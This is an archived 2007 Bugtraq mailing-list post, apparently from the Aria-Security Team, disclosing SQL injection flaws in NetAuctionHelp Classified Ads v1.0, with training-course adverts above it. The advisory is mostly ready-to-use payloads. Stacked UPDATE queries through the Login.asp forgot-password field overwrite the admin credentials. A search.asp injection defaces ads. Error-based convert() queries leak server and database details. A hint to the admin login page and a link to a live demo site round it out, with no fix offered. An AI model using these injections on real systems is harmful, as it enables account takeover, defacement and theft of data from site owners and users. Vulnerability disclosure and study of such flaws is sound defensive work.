Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

NetAuctionHelp Classified Ads v1.0 SQL Injection

from [no-reply] Network Security [Permanent Link]
Subject: NetAuctionHelp Classified Ads v1.0 SQL Injection
Date: 24 Nov 2007 22:11:33 -0000 
Aria-Security Team
http://Aria-Security.Net
------------------------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111
Try it online @  http://ads.netauctionhelp.com


needed tables:

tblMember.id
tblMember.login
tblMember.pswd

Vulnarable Page: Login.asp
Run this query for Forget Password
-1' UPDATE tblMember Set login= 'admin' where(id='1');--
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--


there it is, admin with the password hacked

------------------------------------------------------------------------------------
these may help the attacker to get more info in the search.asp page

/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]


tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t 
itle,tblAd.zip,tblAd.state,tblAd.startdate'


example: -1' update tblAd set title= 'hacked' where(id='1');--
site.com/addetl.asp?id=1 will say HACKED.

1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--


hint: /auctionAdmin/admLogin.asp ;)


Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • NetAuctionHelp Classified Ads v1.0 SQL Injection, no-reply <=
Previous by Date:  Re: Re: Aria-Security.net: NetAuctionHelp SQL Injection, no-reply
Next by Date:  [Full-disclosure] [ GLSA 200711-33 ] nss_ldap: Information disclosure, Pierre-Yves Rofes
Previous by Thread:  vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable, cybermilitan
Next by Thread:  [Full-disclosure] [ GLSA 200711-33 ] nss_ldap: Information disclosure, Pierre-Yves Rofes
Indexes:  [Date] [Thread] [Top] [All Lists]